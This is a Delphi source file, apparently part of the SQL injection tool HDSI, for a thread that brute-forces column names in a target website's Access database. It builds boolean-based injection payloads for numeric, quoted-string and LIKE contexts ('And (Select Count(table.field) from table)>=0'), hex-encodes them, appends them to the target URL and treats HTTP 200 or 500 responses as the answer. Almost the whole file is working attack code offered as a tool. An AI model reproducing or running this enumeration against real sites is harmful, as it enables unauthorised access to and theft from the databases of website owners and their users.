threadacccol.~pas

sql inject HDSI3--delphi.rar

unit ThreadACCCol;

interface
uses
Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms,ComCtrls;
  

  type
  TThreadACCCol = class(TThread)
  function FunfieldExis(URL_source,TableName,FieldName:string):Boolean;
  private
  published

  procedure Execute; override;
  public
    fieldname:string;
	  tablename:string;
    FURL          : String; //URL
    Complete       : Boolean;  //是否下载完毕
  end;

implementation
uses
main_unit,CJdatabase_unit,define_unit;
//******************************************************************************
procedure TThreadACCCol.Execute;
var
 item:TListItem; 
begin
 	if 	FunfieldExis(FURL,tablename,fieldname) then
	begin
		item:=form_main.ListView_table.Items.Add;
                   item.SubItems.Add(tablename);
                   item.Caption:=inttostr(item.Index+1);
	end;
		
end;

//****************猜列函数**********************************
function TThreadACCCol.FunfieldExis(URL_source,TableName,FieldName:string):Boolean;
var
    URL_Check:string;
    icode:integer;
    label start;

begin
   case  CJdatabase_unit.Inject_methord of
      1:
        begin
          URL_Check:= 'And (Select Count(' + TableName + '.' + FieldName + ') from ' + TableName + ')>=0';
        end;
      2:
        begin
          URL_Check:=  ''' And (Select Count(' +TableName + '.' + FieldName+ ') from ' + TableName + ')>=0 And ''''=''';
        end;
      3:
        begin
          URL_Check:= '%'' And (Select Count(' + TableName + '.' + FieldName + ') from ' + TableName + ')>=0 And ''%''=''';
        end;
    end;
    URL_Check:=define_unit.SQLINJECTIONUrlToHex(URL_Check,0);
    URL_Check:=URL_source+URL_Check;
    start:
    icode:=define_unit.GetURLCode(URL_Check);
     if icode=200 then
        result:=true
           else
           begin
              if icode=500 then
              result:=false
                else goto start;
           end;

end;
 
end.